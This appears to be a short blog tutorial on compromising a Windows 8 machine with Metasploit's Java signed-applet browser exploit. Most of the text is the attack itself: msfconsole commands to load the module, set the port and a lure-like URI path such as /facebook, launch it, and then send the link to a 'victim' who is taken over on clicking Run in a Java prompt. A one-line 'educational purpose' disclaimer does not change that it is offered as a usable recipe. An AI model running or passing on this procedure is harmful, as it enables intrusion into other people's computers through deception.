Hacking Windows 8 with Metasploit

Today I am gonna show you how to hack windows 8 using metasploit. As you all know metasploit is pre-installed in Backtrack, so I will be using backtrack 5 in my tutorial. You can also use Kali linux and other pentesting OS's also.
So lets start..

Things you will need ---->

1. Metasploit
2. Victim virtual machine running windows 8(Use Virtual box or virtual machine).
3. Brain.

Now I will show to how to exploit win 8, just follow the steps given below ----->

1. Open metasploit in backtrack using command in terminal "msfconsole".

2. After metasploit open type this command in terminal
use multi/browser/java_signed_applet
3. Now type
set SRVPORT 8080
   Here 8080 is port which will be used metasploit to connect victim machine.

4. Now type 
set URIPATH /
   Here you can use any uripath like /hackedit , /facebook etc.

5. Now type 
Exploit
   Like in the pic given below.
6. Now send your Ip address to victim like 188.234.244.214:8080/
7. Now when our victim will open this link given by us he/she will be promoted with a java pop out and when he/she will click Run button of that pop up the victim comuter will be successfully exploited. Like in picture given below.
      
Note -->
1. This exploit only works when victim has installed Java.
2. This tutorial only for educational purpose.

Comments

Post a Comment